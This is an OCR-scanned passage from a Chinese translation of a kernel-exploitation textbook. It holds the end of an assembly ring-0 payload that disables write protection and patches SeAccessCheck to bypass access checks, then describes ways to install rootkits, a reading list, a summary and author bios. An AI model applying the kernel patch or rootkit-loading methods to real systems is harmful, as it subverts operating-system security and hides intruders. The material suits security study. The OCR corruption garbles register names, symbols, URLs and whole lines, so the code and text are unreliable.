mov word ptr [eax], 0xe990 


// Re-enable the write protect bit 
mov eax, cro 

or eax, 10000h 

mov crO, eax 


//Re-enable interrupts. 
sti 


pop eax 


注意 , 我 们 使 用 的 是 硬 编码 的 SeAccesscheck 地 址 。 为 了 使 这 个 载荷 更 加 健壮 ,我 们 可 以 使 
它 根据 Windows 的 版 本 选择 合适 的 改写 地 址 。 我 们 可 以 通过 在 ntoskrn1 的 输出 表 里 查 找 
SeaccessCheck 的 地 址 , 并 通过 执行 简单 的 反 汇编 器 找 出 正确 的 je 指令 , 使 它 真 正 做 到 动态 适应 。 


27.6.4 安装 rootkit 

人 们 通常 会 利用 内 核 模式 利用 程序 来 安装 rootkit。 下 面 介绍 一 些 常见 的 方法 。 

最 简便 的 方法 或 许 是 把 rootkit 伪 装 成 设备 驱动 程序 ， 然 后 通过 Native API 函 数 zwLoadpriver 
从 磁盘 上 加 载 它 。 这 个 函数 需要 HKLM\System\CurruntControlSet\Services\<DriverName> 
注册 表 键 值 下 面 有 一 个 保存 着 驱动 程序 路 径 的 ImagePath 子 键 。 这 不 是 很 隐秘 ， 相 比 之 下 ， 
rootkit.com 的 Greg Hoglund 公 开 的 方法 更 好 一 些 。 这 个 方法 使 用 了 Native API 函 数 ZwSetSystem- 
Information, #£http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/01 14.thml i] UA 4% BU 48 2 
文档 。 

如 果 内 核 载 荷 正 运行 在 ring 0 里 ， 可 以 采用 另 一 个 更 隐秘 的 方法 : 分 配 非 分 页 内 存 ， 把 磁 
盘 或 网 络 上 的 rootkit 复 制 进来 ， 在 需要 的 时 候 ， 安 排 重 定位 和 输入 表 。 

关于 开发 rootkits 的 更 多 信息 ， 我 们 建议 你 参考 Greg Hoglund 和 Jamie Bullter r 4 MH Rootkits: 
Subverting the Windows Kernel 和 Ric VielerPra& H] Professional Rootkits . 


27.7 Wt shellcoder 的 必 读 资料 


如 果 你 有 兴趣 追踪 内 核 模式 pug， 并 想 了 解 更 详细 的 破解 细节 ， 我 们 推荐 下 面 这 些 文章 。 尽 
管 每 个 月 报告 上 来 的 内 核 模式 缺陷 在 不 断 增 加 ， 但 与 那些 介绍 发 现 和 破解 用 户 模式 pug 的 技术 相 
比 ， 攻 击 内 核 的 资源 还 是 很 少 的 。 
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O bug 检查 和 skape, “Kernel-mode Payloads on Windows”, http://www.uninformed.org/?v= 
3&a=4&t=pdf. 

Q Cache, Johnny. Moore H D 和 skape, “Exploiting 802.11 Wireless Driver Vulnerabilities on 
Windows”. http://www.uninformed.org/?v-6&a-2 &t-pdf. 

Q Jack 和 Barnaby, “Remote Windows Kernel Exploitation: Step into the Ring 0", eEye Digital 
Security white paper. http://research.eeye.com/html/Papers/download/StepintoTheRing.pdf. 

Q Lord Yup, “Win32 Device Drivers Communication Vulnerabilities", http://solo-web.ifrance. 
com/win32ddc.html. 

a 微软 公司 , “User-Mode Interactions: Guidelines for Kernel-Mode Drivers", http://download. 
microsoft.com/download/e/b/a/eba1050f-a3 1d-436b-928 1 -92cdfeae4b45/KM-UMGuide.doc. 


27.8 小 结 


本 章 介 绍 了 一 些 常 见 的 导致 任意 代码 执行 的 内 核 缺 陷 , 并 讨论 了 一 些 有 用 的 载荷 。 从 本 章 可 
以 看 出 , 内 核 代 码 , 特别 是 第 三 方 驱动 程序 代码 , 同样 存在 安全 研究 者 已 经 发 现 并 利用 多 年 的 bug 
种 类 。 假 设 大 家 对 内 核 bug 仍 不 太 关注 的 话 ， 那 么 攻击 者 还 可 以 轻松 找到 许多 漏洞 。 


“黑客 圣经 ! 如 果 你 想 了 解 系统 安全 知识 并 成 为 一 名 黑客 高 手 ， 此 书 必 读 ! ” 
一 一 美国 《计算 机 周刊 》 
“这 几 位 作者 都 是 我 景仰 的 安全 技术 高 手 ， 能 分 享 到 他 们 一 些 鲜 为 人 知 的 安全 攻防 技巧 ， 幸 甚 。” 
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操作 系统 是 连接 计算 机 硬件 与 上 层 软件 及 用 户 的 桥梁 ， 其 安全 性 至 关 重 要 。 知 己 知 彼 ， 方 能 百 战 不 殖 ， 用 户 
只 有 了 解 了 系统 中 存在 的 可 被 利用 的 漏洞 和 攻击 者 所 采用 的 攻击 方法 ， 才 能 更 有 效 地 确保 系统 安全 。 

本 书 由 4 位 世界 顶级 安全 技术 大 师 联 被 打造 ， 全 面 介绍 了 操作 系统 的 安全 问题 。 从 最 基本 的 栈 、 堆 、 内 存 布 
局 等 方面 着 手 ， 逐 渐 深入 到 操作 系统 的 各 个 层面 ， 重 点 阐述 如 何 发 现 和 防范 系统 的 安全 漏洞 。 全 书 内 容 均 来 自作 
者 一 线 实战 经 验 总 结 ， 强 调动 手 实 践 和 探索 的 重要 性 ， 自 始 至 终 体现 了 钻研 无 止境 的 黑客 精神 。 


Chris Anley ”世界 知名 系统 安全 专家 ， 具 有 各 种 操作 系统 漏洞 挖掘 的 丰富 经 验 。Next Generation 安 全 软件 公司 
创始 人 人、 总监。 


John Heasman 世界 知名 安全 专家 ， 尤 其 擅长 于 企业 级 软件 安全 攻防 技术 ， 著 有 多 篇 安全 方面 的 颇 有 影响 力 
的 论文 。 现 任 Next Generation 安 全 软件 公司 研发 总 监 。 


Felix “FX” Linder 世界 知名 安全 专家 ， 具 有 近 20 年 的 计算 机 安全 领域 工作 经 验 ， 熟 悉 各 种 操作 系统 特性 。 
目前 领导 着 德国 著名 安全 技术 咨询 公司 SABRE Labs。 


Gerardo Richarte ”著名 安全 技术 专家 ， 精 通 漏洞 挖掘 和 逆向 工程 。 他 还 参与 开发 了 著名 的 SqueakNOS 项 目 。 
现 为 Core 安全 技术 公司 技术 骨干 。 
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